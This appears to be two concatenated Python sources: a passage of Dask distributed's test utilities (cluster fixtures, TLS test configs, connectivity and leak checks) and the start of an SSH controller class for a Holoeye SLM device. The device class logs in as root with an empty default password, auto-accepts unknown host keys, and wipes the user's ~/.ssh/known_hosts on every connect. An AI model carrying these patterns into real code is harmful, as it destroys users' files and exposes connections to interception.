if not re.match("IOLoop is clos(ed|ing)", str(e)):
raise
except gen.TimeoutError:
pass
else:
is_stopped.wait()
@pytest.fixture
def loop_in_thread():
with pristine_loop() as loop:
thread = threading.Thread(target=loop.start, name="test IOLoop")
thread.daemon = True
thread.start()
loop_started = threading.Event()
loop.add_callback(loop_started.set)
loop_started.wait()
yield loop
loop.add_callback(loop.stop)
thread.join(timeout=5)
@pytest.fixture
def zmq_ctx():
import zmq
ctx = zmq.Context.instance()
yield ctx
ctx.destroy(linger=0)
@contextmanager
def pristine_loop():
IOLoop.clear_instance()
IOLoop.clear_current()
loop = IOLoop()
loop.make_current()
assert IOLoop.current() is loop
try:
yield loop
finally:
try:
loop.close(all_fds=True)
except (KeyError, ValueError):
pass
IOLoop.clear_instance()
IOLoop.clear_current()
@contextmanager
def mock_ipython():
from unittest import mock
from distributed._ipython_utils import remote_magic
ip = mock.Mock()
ip.user_ns = {}
ip.kernel = None
def get_ip():
return ip
with mock.patch("IPython.get_ipython", get_ip), mock.patch(
"distributed._ipython_utils.get_ipython", get_ip
):
yield ip
# cleanup remote_magic client cache
for kc in remote_magic._clients.values():
kc.stop_channels()
remote_magic._clients.clear()
original_config = copy.deepcopy(dask.config.config)
def reset_config():
dask.config.config.clear()
dask.config.config.update(copy.deepcopy(original_config))
def nodebug(func):
"""
A decorator to disable debug facilities during timing-sensitive tests.
Warning: this doesn't affect already created IOLoops.
"""
@functools.wraps(func)
def wrapped(*args, **kwargs):
old_asyncio_debug = os.environ.get("PYTHONASYNCIODEBUG")
if old_asyncio_debug is not None:
del os.environ["PYTHONASYNCIODEBUG"]
try:
return func(*args, **kwargs)
finally:
if old_asyncio_debug is not None:
os.environ["PYTHONASYNCIODEBUG"] = old_asyncio_debug
return wrapped
def nodebug_setup_module(module):
"""
A setup_module() that you can install in a test module to disable
debug facilities.
"""
module._old_asyncio_debug = os.environ.get("PYTHONASYNCIODEBUG")
if module._old_asyncio_debug is not None:
del os.environ["PYTHONASYNCIODEBUG"]
def nodebug_teardown_module(module):
"""
A teardown_module() that you can install in a test module to reenable
debug facilities.
"""
if module._old_asyncio_debug is not None:
os.environ["PYTHONASYNCIODEBUG"] = module._old_asyncio_debug
def inc(x):
return x + 1
def dec(x):
return x - 1
def mul(x, y):
return x * y
def div(x, y):
return x / y
def deep(n):
if n > 0:
return deep(n - 1)
else:
return True
def throws(x):
raise RuntimeError("hello!")
def double(x):
return x * 2
def slowinc(x, delay=0.02):
sleep(delay)
return x + 1
def slowdec(x, delay=0.02):
sleep(delay)
return x - 1
def slowdouble(x, delay=0.02):
sleep(delay)
return 2 * x
def randominc(x, scale=1):
from random import random
sleep(random() * scale)
return x + 1
def slowadd(x, y, delay=0.02):
sleep(delay)
return x + y
def slowsum(seq, delay=0.02):
sleep(delay)
return sum(seq)
def slowidentity(*args, **kwargs):
delay = kwargs.get("delay", 0.02)
sleep(delay)
if len(args) == 1:
return args[0]
else:
return args
def run_for(duration, timer=time):
"""
Burn CPU for *duration* seconds.
"""
deadline = timer() + duration
while timer() <= deadline:
pass
# This dict grows at every varying() invocation
_varying_dict = collections.defaultdict(int)
_varying_key_gen = itertools.count()
class _ModuleSlot(object):
def __init__(self, modname, slotname):
self.modname = modname
self.slotname = slotname
def get(self):
return getattr(sys.modules[self.modname], self.slotname)
def varying(items):
"""
Return a function that returns a result (or raises an exception)
from *items* at each call.
"""
# cloudpickle would serialize the *values* of all globals
# used by *func* below, so we can't use `global <something>`.
# Instead look up the module by name to get the original namespace
# and not a copy.
slot = _ModuleSlot(__name__, "_varying_dict")
key = next(_varying_key_gen)
def func():
dct = slot.get()
i = dct[key]
if i == len(items):
raise IndexError
else:
x = items[i]
dct[key] = i + 1
if isinstance(x, Exception):
raise x
else:
return x
return func
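# Illustrative sketch (not from the original test suite): varying() returns a
# stateful callable that walks through *items* on successive calls, returning
# plain values and re-raising any Exception instances it encounters, e.g.:
#
#     func = varying([1, ZeroDivisionError("boom"), 3])
#     func()   # -> 1
#     func()   # raises ZeroDivisionError("boom")
#     func()   # -> 3
#     func()   # raises IndexError once the items are exhausted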
def map_varying(itemslists):
"""
Like *varying*, but return the full specification for a map() call
on multiple items lists.
"""
def apply(func, *args, **kwargs):
return func(*args, **kwargs)
return apply, list(map(varying, itemslists))
async def geninc(x, delay=0.02):
await asyncio.sleep(delay)
return x + 1
def compile_snippet(code, dedent=True):
if dedent:
code = textwrap.dedent(code)
code = compile(code, "<dynamic>", "exec")
ns = globals()
exec(code, ns, ns)
if sys.version_info >= (3, 5):
compile_snippet(
"""
async def asyncinc(x, delay=0.02):
await asyncio.sleep(delay)
return x + 1
"""
)
assert asyncinc # noqa: F821
else:
asyncinc = None
_readone_queues = {}
async def readone(comm):
"""
Read one message at a time from a comm that reads lists of
messages.
"""
try:
q = _readone_queues[comm]
except KeyError:
q = _readone_queues[comm] = queues.Queue()
async def background_read():
while True:
try:
messages = await comm.read()
except CommClosedError:
break
for msg in messages:
q.put_nowait(msg)
q.put_nowait(None)
del _readone_queues[comm]
background_read()
msg = await q.get()
if msg is None:
raise CommClosedError
else:
return msg
def run_scheduler(q, nputs, port=0, **kwargs):
from distributed import Scheduler
# On Python 2.7 and Unix, fork() is used to spawn child processes,
# so avoid inheriting the parent's IO loop.
with pristine_loop() as loop:
async def _():
scheduler = await Scheduler(
validate=True, host="127.0.0.1", port=port, **kwargs
)
for i in range(nputs):
q.put(scheduler.address)
await scheduler.finished()
try:
loop.run_sync(_)
finally:
loop.close(all_fds=True)
def run_worker(q, scheduler_q, **kwargs):
from distributed import Worker
reset_logger_locks()
with log_errors():
with pristine_loop() as loop:
scheduler_addr = scheduler_q.get()
async def _():
worker = await Worker(scheduler_addr, validate=True, **kwargs)
q.put(worker.address)
await worker.finished()
try:
loop.run_sync(_)
finally:
loop.close(all_fds=True)
def run_nanny(q, scheduler_q, **kwargs):
with log_errors():
with pristine_loop() as loop:
scheduler_addr = scheduler_q.get()
async def _():
worker = await Nanny(scheduler_addr, validate=True, **kwargs)
q.put(worker.address)
await worker.finished()
try:
loop.run_sync(_)
finally:
loop.close(all_fds=True)
@contextmanager
def check_active_rpc(loop, active_rpc_timeout=1):
active_before = set(rpc.active)
yield
# Some streams can take a bit of time to notice their peer
# has closed, and keep a coroutine (*) waiting for a CommClosedError
# before calling close_rpc() after a CommClosedError.
# This would happen especially if a non-localhost address is used,
# as Nanny does.
# (*) (example: gather_from_workers())
def fail():
pytest.fail(
"some RPCs left active by test: %s" % (set(rpc.active) - active_before)
)
async def wait():
await async_wait_for(
lambda: len(set(rpc.active) - active_before) == 0,
timeout=active_rpc_timeout,
fail_func=fail,
)
loop.run_sync(wait)
@pytest.fixture
def cluster_fixture(loop):
with cluster() as (scheduler, workers):
yield (scheduler, workers)
@pytest.fixture
def s(cluster_fixture):
scheduler, workers = cluster_fixture
return scheduler
@pytest.fixture
def a(cluster_fixture):
scheduler, workers = cluster_fixture
return workers[0]
@pytest.fixture
def b(cluster_fixture):
scheduler, workers = cluster_fixture
return workers[1]
@pytest.fixture
def client(loop, cluster_fixture):
scheduler, workers = cluster_fixture
with Client(scheduler["address"], loop=loop) as client:
yield client
@pytest.fixture
def client_secondary(loop, cluster_fixture):
scheduler, workers = cluster_fixture
with Client(scheduler["address"], loop=loop) as client:
yield client
@contextmanager
def tls_cluster_context(
worker_kwargs=None, scheduler_kwargs=None, security=None, **kwargs
):
security = security or tls_only_security()
worker_kwargs = assoc(worker_kwargs or {}, "security", security)
scheduler_kwargs = assoc(scheduler_kwargs or {}, "security", security)
with cluster(
worker_kwargs=worker_kwargs, scheduler_kwargs=scheduler_kwargs, **kwargs
) as (s, workers):
yield s, workers
@pytest.fixture
def tls_cluster(loop, security):
with tls_cluster_context(security=security) as (scheduler, workers):
yield (scheduler, workers)
@pytest.fixture
def tls_client(tls_cluster, loop, security):
s, workers = tls_cluster
with Client(s["address"], security=security, loop=loop) as client:
yield client
@pytest.fixture
def security():
return tls_only_security()
@contextmanager
def cluster(
nworkers=2, nanny=False, worker_kwargs={}, active_rpc_timeout=1, scheduler_kwargs={}
):
ws = weakref.WeakSet()
enable_proctitle_on_children()
with clean(timeout=active_rpc_timeout, threads=False) as loop:
if nanny:
_run_worker = run_nanny
else:
_run_worker = run_worker
# The scheduler queue will receive the scheduler's address
scheduler_q = mp_context.Queue()
# Launch scheduler
scheduler = mp_context.Process(
name="Dask cluster test: Scheduler",
target=run_scheduler,
args=(scheduler_q, nworkers + 1),
kwargs=scheduler_kwargs,
)
ws.add(scheduler)
scheduler.daemon = True
scheduler.start()
# Launch workers
workers = []
for i in range(nworkers):
q = mp_context.Queue()
fn = "_test_worker-%s" % uuid.uuid4()
kwargs = merge(
{
"nthreads": 1,
"local_directory": fn,
"memory_limit": system.MEMORY_LIMIT,
},
worker_kwargs,
)
proc = mp_context.Process(
name="Dask cluster test: Worker",
target=_run_worker,
args=(q, scheduler_q),
kwargs=kwargs,
)
ws.add(proc)
workers.append({"proc": proc, "queue": q, "dir": fn})
for worker in workers:
worker["proc"].start()
try:
for worker in workers:
worker["address"] = worker["queue"].get(timeout=5)
except queue.Empty:
raise pytest.xfail.Exception("Worker failed to start in test")
saddr = scheduler_q.get()
start = time()
try:
try:
security = scheduler_kwargs["security"]
rpc_kwargs = {"connection_args": security.get_connection_args("client")}
except KeyError:
rpc_kwargs = {}
with rpc(saddr, **rpc_kwargs) as s:
while True:
nthreads = loop.run_sync(s.ncores)
if len(nthreads) == nworkers:
break
if time() - start > 5:
raise Exception("Timeout on cluster creation")
# avoid sending processes down to function
yield {"address": saddr}, [
{"address": w["address"], "proc": weakref.ref(w["proc"])}
for w in workers
]
finally:
logger.debug("Closing out test cluster")
loop.run_sync(
lambda: disconnect_all(
[w["address"] for w in workers], timeout=0.5, rpc_kwargs=rpc_kwargs
)
)
loop.run_sync(lambda: disconnect(saddr, timeout=0.5, rpc_kwargs=rpc_kwargs))
scheduler.terminate()
scheduler_q.close()
scheduler_q._reader.close()
scheduler_q._writer.close()
for w in workers:
w["proc"].terminate()
w["queue"].close()
w["queue"]._reader.close()
w["queue"]._writer.close()
scheduler.join(2)
del scheduler
for proc in [w["proc"] for w in workers]:
proc.join(timeout=2)
with ignoring(UnboundLocalError):
del worker, w, proc
del workers[:]
for fn in glob("_test_worker-*"):
with ignoring(OSError):
shutil.rmtree(fn)
try:
client = default_client()
except ValueError:
pass
else:
client.close()
start = time()
while any(proc.is_alive() for proc in ws):
text = str(list(ws))
sleep(0.2)
assert time() < start + 5, ("Workers still around after five seconds", text)
async def disconnect(addr, timeout=3, rpc_kwargs=None):
rpc_kwargs = rpc_kwargs or {}
async def do_disconnect():
with ignoring(EnvironmentError, CommClosedError):
with rpc(addr, **rpc_kwargs) as w:
await w.terminate(close=True)
with ignoring(TimeoutError):
await gen.with_timeout(timedelta(seconds=timeout), do_disconnect())
async def disconnect_all(addresses, timeout=3, rpc_kwargs=None):
await asyncio.gather(*[disconnect(addr, timeout, rpc_kwargs) for addr in addresses])
def gen_test(timeout=10):
""" Coroutine test
@gen_test(timeout=5)
def test_foo():
yield ... # use tornado coroutines
"""
def _(func):
def test_func():
with clean() as loop:
if iscoroutinefunction(func):
cor = func
else:
cor = gen.coroutine(func)
loop.run_sync(cor, timeout=timeout)
return test_func
return _
from .scheduler import Scheduler
from .worker import Worker
async def start_cluster(
nthreads,
scheduler_addr,
loop,
security=None,
Worker=Worker,
scheduler_kwargs={},
worker_kwargs={},
):
s = await Scheduler(
loop=loop,
validate=True,
security=security,
port=0,
host=scheduler_addr,
**scheduler_kwargs
)
workers = [
Worker(
s.address,
nthreads=ncore[1],
name=i,
security=security,
loop=loop,
validate=True,
host=ncore[0],
**(merge(worker_kwargs, ncore[2]) if len(ncore) > 2 else worker_kwargs)
)
for i, ncore in enumerate(nthreads)
]
# for w in workers:
# w.rpc = workers[0].rpc
await asyncio.gather(*workers)
start = time()
while len(s.workers) < len(nthreads) or any(
comm.comm is None for comm in s.stream_comms.values()
):
await asyncio.sleep(0.01)
if time() - start > 5:
await asyncio.gather(*[w.close(timeout=1) for w in workers])
await s.close(fast=True)
raise Exception("Cluster creation timeout")
return s, workers
async def end_cluster(s, workers):
logger.debug("Closing out test cluster")
async def end_worker(w):
with ignoring(TimeoutError, CommClosedError, EnvironmentError):
await w.close(report=False)
await asyncio.gather(*[end_worker(w) for w in workers])
await s.close() # wait until scheduler stops completely
s.stop()
def gen_cluster(
nthreads=[("127.0.0.1", 1), ("127.0.0.1", 2)],
ncores=None,
scheduler="127.0.0.1",
timeout=10,
security=None,
Worker=Worker,
client=False,
scheduler_kwargs={},
worker_kwargs={},
client_kwargs={},
active_rpc_timeout=1,
config={},
clean_kwargs={},
):
from distributed import Client
""" Coroutine test with small cluster
@gen_cluster()
def test_foo(scheduler, worker1, worker2):
yield ... # use tornado coroutines
See also:
start
end
"""
if ncores is not None:
warnings.warn("ncores= has moved to nthreads=", stacklevel=2)
nthreads = ncores
worker_kwargs = merge(
{"memory_limit": system.MEMORY_LIMIT, "death_timeout": 10}, worker_kwargs
)
def _(func):
if not iscoroutinefunction(func):
func = gen.coroutine(func)
def test_func():
result = None
workers = []
with clean(timeout=active_rpc_timeout, **clean_kwargs) as loop:
async def coro():
with dask.config.set(config):
s = False
for i in range(5):
try:
s, ws = await start_cluster(
nthreads,
scheduler,
loop,
security=security,
Worker=Worker,
scheduler_kwargs=scheduler_kwargs,
worker_kwargs=worker_kwargs,
)
except Exception as e:
logger.error(
"Failed to start gen_cluster, retrying",
exc_info=True,
)
else:
workers[:] = ws
args = [s] + workers
break
if s is False:
raise Exception("Could not start cluster")
if client:
c = await Client(
s.address,
loop=loop,
security=security,
asynchronous=True,
**client_kwargs
)
args = [c] + args
try:
future = func(*args)
if timeout:
future = gen.with_timeout(
timedelta(seconds=timeout), future
)
result = await future
if s.validate:
s.validate_state()
finally:
if client and c.status not in ("closing", "closed"):
await c._close(fast=s.status == "closed")
await end_cluster(s, workers)
await gen.with_timeout(
timedelta(seconds=1), cleanup_global_workers()
)
try:
c = await default_client()
except ValueError:
pass
else:
await c._close(fast=True)
for i in range(5):
if all(c.closed() for c in Comm._instances):
break
else:
await asyncio.sleep(0.05)
else:
L = [c for c in Comm._instances if not c.closed()]
Comm._instances.clear()
# raise ValueError("Unclosed Comms", L)
print("Unclosed Comms", L)
return result
result = loop.run_sync(
coro, timeout=timeout * 2 if timeout else timeout
)
for w in workers:
if getattr(w, "data", None):
try:
w.data.clear()
except EnvironmentError:
# zict backends can fail if their storage directory
# was already removed
pass
del w.data
return result
return test_func
return _
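# Illustrative sketch (assumed usage, mirroring the docstring above): with
# client=True the decorated coroutine also receives an asynchronous Client as
# its first argument, ahead of the scheduler and workers, e.g.:
#
#     @gen_cluster(client=True)
#     async def test_submit_inc(c, s, a, b):
#         future = c.submit(inc, 1)
#         assert await future == 2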
def raises(func, exc=Exception):
try:
func()
return False
except exc:
return True
def terminate_process(proc):
if proc.poll() is None:
if sys.platform.startswith("win"):
proc.send_signal(signal.CTRL_BREAK_EVENT)
else:
proc.send_signal(signal.SIGINT)
try:
if sys.version_info[0] == 3:
proc.wait(10)
else:
start = time()
while proc.poll() is None and time() < start + 10:
sleep(0.02)
finally:
# Make sure we don't leave the process lingering around
with ignoring(OSError):
proc.kill()
@contextmanager
def popen(args, **kwargs):
kwargs["stdout"] = subprocess.PIPE
kwargs["stderr"] = subprocess.PIPE
if sys.platform.startswith("win"):
# Allow using CTRL_C_EVENT / CTRL_BREAK_EVENT
kwargs["creationflags"] = subprocess.CREATE_NEW_PROCESS_GROUP
dump_stdout = False
args = list(args)
if sys.platform.startswith("win"):
args[0] = os.path.join(sys.prefix, "Scripts", args[0])
else:
args[0] = os.path.join(
os.environ.get("DESTDIR", "") + sys.prefix, "bin", args[0]
)
proc = subprocess.Popen(args, **kwargs)
try:
yield proc
except Exception:
dump_stdout = True
raise
finally:
try:
terminate_process(proc)
finally:
# XXX Also dump stdout if return code != 0 ?
out, err = proc.communicate()
if dump_stdout:
print("\n\nPrint from stderr\n %s\n=================\n" % args[0][0])
print(err.decode())
print("\n\nPrint from stdout\n=================\n")
print(out.decode())
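# Illustrative sketch (hypothetical command, assuming the CLI entry point is
# installed in the current prefix): popen() resolves the executable relative to
# sys.prefix, captures stdout/stderr, and always terminates the process on
# exit, e.g.:
#
#     with popen(["dask-scheduler", "--port", "8786"]) as proc:
#         wait_for_port(("127.0.0.1", 8786), timeout=10)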
def wait_for_port(address, timeout=5):
assert isinstance(address, tuple)
deadline = time() + timeout
while True:
timeout = deadline - time()
if timeout < 0:
raise RuntimeError("Failed to connect to %s" % (address,))
try:
sock = socket.create_connection(address, timeout=timeout)
except EnvironmentError:
pass
else:
sock.close()
break
def wait_for(predicate, timeout, fail_func=None, period=0.001):
deadline = time() + timeout
while not predicate():
sleep(period)
if time() > deadline:
if fail_func is not None:
fail_func()
pytest.fail("condition not reached until %s seconds" % (timeout,))
async def async_wait_for(predicate, timeout, fail_func=None, period=0.001):
deadline = time() + timeout
while not predicate():
await asyncio.sleep(period)
if time() > deadline:
if fail_func is not None:
fail_func()
pytest.fail("condition not reached until %s seconds" % (timeout,))
@memoize
def has_ipv6():
"""
Return whether IPv6 is locally functional. This doesn't guarantee IPv6
is properly configured outside of localhost.
"""
serv = cli = None
try:
serv = socket.socket(socket.AF_INET6, socket.SOCK_STREAM)
serv.bind(("::", 0))
serv.listen(5)
cli = socket.create_connection(serv.getsockname()[:2])
except EnvironmentError:
return False
else:
return True
finally:
if cli is not None:
cli.close()
if serv is not None:
serv.close()
if has_ipv6():
def requires_ipv6(test_func):
return test_func
else:
requires_ipv6 = pytest.mark.skip("ipv6 required")
async def assert_can_connect(addr, timeout=None, connection_args=None):
"""
Check that it is possible to connect to the distributed *addr*
within the given *timeout*.
"""
if timeout is None:
timeout = 0.5
comm = await connect(addr, timeout=timeout, connection_args=connection_args)
comm.abort()
async def assert_cannot_connect(
addr, timeout=None, connection_args=None, exception_class=EnvironmentError
):
"""
Check that it is impossible to connect to the distributed *addr*
within the given *timeout*.
"""
if timeout is None:
timeout = 0.5
with pytest.raises(exception_class):
comm = await connect(addr, timeout=timeout, connection_args=connection_args)
comm.abort()
async def assert_can_connect_from_everywhere_4_6(
port, timeout=None, connection_args=None, protocol="tcp"
):
"""
Check that the local *port* is reachable from all IPv4 and IPv6 addresses.
"""
args = (timeout, connection_args)
futures = [
assert_can_connect("%s://127.0.0.1:%d" % (protocol, port), *args),
assert_can_connect("%s://%s:%d" % (protocol, get_ip(), port), *args),
]
if has_ipv6():
futures += [
assert_can_connect("%s://[::1]:%d" % (protocol, port), *args),
assert_can_connect("%s://[%s]:%d" % (protocol, get_ipv6(), port), *args),
]
await asyncio.gather(*futures)
async def assert_can_connect_from_everywhere_4(
port, timeout=None, connection_args=None, protocol="tcp"
):
"""
Check that the local *port* is reachable from all IPv4 addresses.
"""
args = (timeout, connection_args)
futures = [
assert_can_connect("%s://127.0.0.1:%d" % (protocol, port), *args),
assert_can_connect("%s://%s:%d" % (protocol, get_ip(), port), *args),
]
if has_ipv6():
futures += [
assert_cannot_connect("%s://[::1]:%d" % (protocol, port), *args),
assert_cannot_connect("%s://[%s]:%d" % (protocol, get_ipv6(), port), *args),
]
await asyncio.gather(*futures)
async def assert_can_connect_locally_4(port, timeout=None, connection_args=None):
"""
Check that the local *port* is only reachable from local IPv4 addresses.
"""
args = (timeout, connection_args)
futures = [assert_can_connect("tcp://127.0.0.1:%d" % port, *args)]
if get_ip() != "127.0.0.1": # No outside IPv4 connectivity?
futures += [assert_cannot_connect("tcp://%s:%d" % (get_ip(), port), *args)]
if has_ipv6():
futures += [
assert_cannot_connect("tcp://[::1]:%d" % port, *args),
assert_cannot_connect("tcp://[%s]:%d" % (get_ipv6(), port), *args),
]
await asyncio.gather(*futures)
async def assert_can_connect_from_everywhere_6(
port, timeout=None, connection_args=None
):
"""
Check that the local *port* is reachable from all IPv6 addresses.
"""
assert has_ipv6()
args = (timeout, connection_args)
futures = [
assert_cannot_connect("tcp://127.0.0.1:%d" % port, *args),
assert_cannot_connect("tcp://%s:%d" % (get_ip(), port), *args),
assert_can_connect("tcp://[::1]:%d" % port, *args),
assert_can_connect("tcp://[%s]:%d" % (get_ipv6(), port), *args),
]
await asyncio.gather(*futures)
async def assert_can_connect_locally_6(port, timeout=None, connection_args=None):
"""
Check that the local *port* is only reachable from local IPv6 addresses.
"""
assert has_ipv6()
args = (timeout, connection_args)
futures = [
assert_cannot_connect("tcp://127.0.0.1:%d" % port, *args),
assert_cannot_connect("tcp://%s:%d" % (get_ip(), port), *args),
assert_can_connect("tcp://[::1]:%d" % port, *args),
]
if get_ipv6() != "::1": # No outside IPv6 connectivity?
futures += [assert_cannot_connect("tcp://[%s]:%d" % (get_ipv6(), port), *args)]
await asyncio.gather(*futures)
@contextmanager
def captured_logger(logger, level=logging.INFO, propagate=None):
"""Capture output from the given Logger.
"""
if isinstance(logger, str):
logger = logging.getLogger(logger)
orig_level = logger.level
orig_handlers = logger.handlers[:]
if propagate is not None:
orig_propagate = logger.propagate
logger.propagate = propagate
sio = io.StringIO()
logger.handlers[:] = [logging.StreamHandler(sio)]
logger.setLevel(level)
try:
yield sio
finally:
logger.handlers[:] = orig_handlers
logger.setLevel(orig_level)
if propagate is not None:
logger.propagate = orig_propagate
@contextmanager
def captured_handler(handler):
"""Capture output from the given logging.StreamHandler.
"""
assert isinstance(handler, logging.StreamHandler)
orig_stream = handler.stream
handler.stream = io.StringIO()
try:
yield handler.stream
finally:
handler.stream = orig_stream
@contextmanager
def new_config(new_config):
"""
Temporarily change configuration dictionary.
"""
from .config import defaults
config = dask.config.config
orig_config = copy.deepcopy(config)
try:
config.clear()
config.update(copy.deepcopy(defaults))
dask.config.update(config, new_config)
initialize_logging(config)
yield
finally:
config.clear()
config.update(orig_config)
initialize_logging(config)
@contextmanager
def new_environment(changes):
saved_environ = os.environ.copy()
os.environ.update(changes)
try:
yield
finally:
os.environ.clear()
os.environ.update(saved_environ)
@contextmanager
def new_config_file(c):
"""
Temporarily change configuration file to match dictionary *c*.
"""
import yaml
old_file = os.environ.get("DASK_CONFIG")
fd, path = tempfile.mkstemp(prefix="dask-config")
try:
with os.fdopen(fd, "w") as f:
f.write(yaml.dump(c))
os.environ["DASK_CONFIG"] = path
try:
yield
finally:
if old_file:
os.environ["DASK_CONFIG"] = old_file
else:
del os.environ["DASK_CONFIG"]
finally:
os.remove(path)
certs_dir = os.path.abspath(os.path.join(os.path.dirname(__file__), "tests"))
def get_cert(filename):
"""
Get the path to one of the test TLS certificates.
"""
path = os.path.join(certs_dir, filename)
assert os.path.exists(path), path
return path
def tls_config():
"""
A functional TLS configuration with our test certs.
"""
ca_file = get_cert("tls-ca-cert.pem")
keycert = get_cert("tls-key-cert.pem")
return {
"distributed": {
"comm": {
"tls": {
"ca-file": ca_file,
"client": {"cert": keycert},
"scheduler": {"cert": keycert},
"worker": {"cert": keycert},
}
}
}
}
def tls_only_config():
"""
A functional TLS configuration with our test certs, disallowing
plain TCP communications.
"""
c = tls_config()
c["distributed"]["comm"]["require-encryption"] = True
return c
def tls_security():
"""
A Security object with proper TLS configuration.
"""
with new_config(tls_config()):
sec = Security()
return sec
def tls_only_security():
"""
A Security object with proper TLS configuration and disallowing plain
TCP communications.
"""
with new_config(tls_only_config()):
sec = Security()
assert sec.require_encryption
return sec
def get_server_ssl_context(
certfile="tls-cert.pem", keyfile="tls-key.pem", ca_file="tls-ca-cert.pem"
):
ctx = ssl.create_default_context(ssl.Purpose.CLIENT_AUTH, cafile=get_cert(ca_file))
ctx.check_hostname = False
ctx.verify_mode = ssl.CERT_REQUIRED
ctx.load_cert_chain(get_cert(certfile), get_cert(keyfile))
return ctx
def get_client_ssl_context(
certfile="tls-cert.pem", keyfile="tls-key.pem", ca_file="tls-ca-cert.pem"
):
ctx = ssl.create_default_context(ssl.Purpose.SERVER_AUTH, cafile=get_cert(ca_file))
ctx.check_hostname = False
ctx.verify_mode = ssl.CERT_REQUIRED
ctx.load_cert_chain(get_cert(certfile), get_cert(keyfile))
return ctx
def bump_rlimit(limit, desired):
resource = pytest.importorskip("resource")
try:
soft, hard = resource.getrlimit(limit)
if soft < desired:
resource.setrlimit(limit, (desired, max(hard, desired)))
except Exception as e:
pytest.skip("rlimit too low (%s) and can't be increased: %s" % (soft, e))
def gen_tls_cluster(**kwargs):
kwargs.setdefault("nthreads", [("tls://127.0.0.1", 1), ("tls://127.0.0.1", 2)])
return gen_cluster(
scheduler="tls://127.0.0.1", security=tls_only_security(), **kwargs
)
@contextmanager
def save_sys_modules():
old_modules = sys.modules.copy()
old_path = sys.path
try:
yield
finally:
for i, elem in enumerate(sys.path):
if elem not in old_path:
del sys.path[i]
for elem in list(sys.modules.keys()):
if elem not in old_modules:
del sys.modules[elem]
@contextmanager
def check_thread_leak():
active_threads_start = set(threading._active)
yield
start = time()
while True:
bad = [
t
for t, v in threading._active.items()
if t not in active_threads_start
and "Threaded" not in v.name
and "watch message" not in v.name
and "TCP-Executor" not in v.name
]
if not bad:
break
else:
sleep(0.01)
if time() > start + 5:
from distributed import profile
tid = bad[0]
thread = threading._active[tid]
call_stacks = profile.call_stack(sys._current_frames()[tid])
assert False, (thread, call_stacks)
@contextmanager
def check_process_leak(check=True):
for proc in mp_context.active_children():
proc.terminate()
yield
if check:
for i in range(100):
if not set(mp_context.active_children()):
break
else:
sleep(0.2)
else:
assert not mp_context.active_children()
_cleanup_dangling()
for proc in mp_context.active_children():
proc.terminate()
@contextmanager
def check_instances():
Client._instances.clear()
Worker._instances.clear()
Scheduler._instances.clear()
SpecCluster._instances.clear()
# assert all(n.status == "closed" for n in Nanny._instances), {
# n: n.status for n in Nanny._instances
# }
Nanny._instances.clear()
_global_clients.clear()
Comm._instances.clear()
yield
start = time()
while set(_global_clients):
sleep(0.1)
assert time() < start + 10
_global_clients.clear()
for w in Worker._instances:
with ignoring(RuntimeError): # closed IOLoop
w.loop.add_callback(w.close, report=False, executor_wait=False)
if w.status == "running":
w.loop.add_callback(w.close)
Worker._instances.clear()
for i in range(5):
if all(c.closed() for c in Comm._instances):
break
else:
sleep(0.1)
else:
L = [c for c in Comm._instances if not c.closed()]
Comm._instances.clear()
print("Unclosed Comms", L)
# raise ValueError("Unclosed Comms", L)
assert all(n.status == "closed" or n.status == "init" for n in Nanny._instances), {
n: n.status for n in Nanny._instances
}
# assert not list(SpecCluster._instances) # TODO
assert all(c.status == "closed" for c in SpecCluster._instances)
SpecCluster._instances.clear()
Nanny._instances.clear()
DequeHandler.clear_all_instances()
@contextmanager
def clean(threads=not WINDOWS, instances=True, timeout=1, processes=True):
@contextmanager
def null():
yield
with check_thread_leak() if threads else null():
with pristine_loop() as loop:
with check_process_leak(check=processes):
with check_instances() if instances else null():
with check_active_rpc(loop, timeout):
reset_config()
dask.config.set({"distributed.comm.timeouts.connect": "5s"})
# Restore default logging levels
# XXX use pytest hooks/fixtures instead?
for name, level in logging_levels.items():
logging.getLogger(name).setLevel(level)
yield loop
with ignoring(AttributeError):
del thread_state.on_event_loop_thread
@pytest.fixture
def cleanup():
with check_thread_leak():
with check_process_leak():
with check_instances():
reset_config()
dask.config.set({"distributed.comm.timeouts.connect": "5s"})
for name, level in logging_levels.items():
logging.getLogger(name).setLevel(level)
yield
|
__init__.py
|
import threading
import numpy as np
import imageio
import os
import paramiko
from paramiko import SSHClient
from scp import SCPClient
class HoloeyeSLM (SSHClient):
class Commands:
PWD = 'pwd'
GO_HOME = "cd ~"
SET_LIBRARY = "export LD_LIBRARY_PATH=/mnt"
DISABLE_HDMI = "/mnt/ControlExmpl -a"
SHOW_IMAGE = "/mnt/ControlExmpl -o ~/tmp.bmp"
CHANGE_IP = "ifconfig usb0 {0} {1}"
invalid_input_err = "INVALID input: the image/array must have shape ({0}, {1}) and its pixel values must lie between {2} and {3}"
CACHE_PATH = "./cache"
'''
Initializes and establishes the connection to the device
'''
def flush_RSA_Keys(self):
if self.RSA_Keys is None:
# default to the user's known_hosts file so it can be cleared below, ignoring I/O errors
self.RSA_Keys = os.path.expanduser("~/.ssh/known_hosts")
try:
fb = open(self.RSA_Keys,'wb')
fb.write(b'')
fb.close()
except IOError:
pass
def __init__(self, host='10.10.70.1', port=22, username='root', password='', width=1920, height=1080, min=0, max=255, logging=False,RSA_Keys=None):
self.logging = logging
self.RSA_Keys = RSA_Keys
if(not os.path.exists(self.CACHE_PATH)):
os.mkdir(self.CACHE_PATH)
self.width = width
self.height = height
self.min = min
self.max = max
self.invalid_array_err = self.invalid_input_err.format(
height, width, min, max)
self.hostname = host
self.port = port
self.username = username
self.password = password
self.prepare_connect()
def prepare_connect(self):
self.flush_RSA_Keys()
super().__init__()
self.set_missing_host_key_policy(paramiko.AutoAddPolicy())
self.connect()
self.channel = self.invoke_shell()
self._go_home()
self._set_library_path()
self.diconnectHDMI()
self.logger = threading.Thread(target=self.__log,daemon=True,name='HoloeyeSLM {0} Logger'.format(self.hostname))
self.logger.start()
def __log(self):
while (self.logging):
print("Holoeye SLM Log.:. \n")
while not self.channel.recv_ready():
pass
out = self.channel.recv(9999)
print(out)
'''
gets the current session directory
'''
def _pwd(self):
stdin, stdout, stderr = self.exec_command(self.Commands.PWD)
lines = stdout.readlines()
return lines
'''
Setups the current session directory to home
'''
def _go_home(self):
self.channel.send(self.Commands.GO_HOME+'\n')
# while not self.channel.recv_ready():
# pass
# out = self.channel.recv(9999)
# print(out.decode())
'''
Setups the libraries path in SLM
'''
def _set_library_path(self):
self.channel.send(self.Commands.SET_LIBRARY+'\n')
# while not self.channel.recv_ready():
# pass
# out = self.channel.recv(9999)
# print(out.decode())
'''
Runs the show command on slm
'''
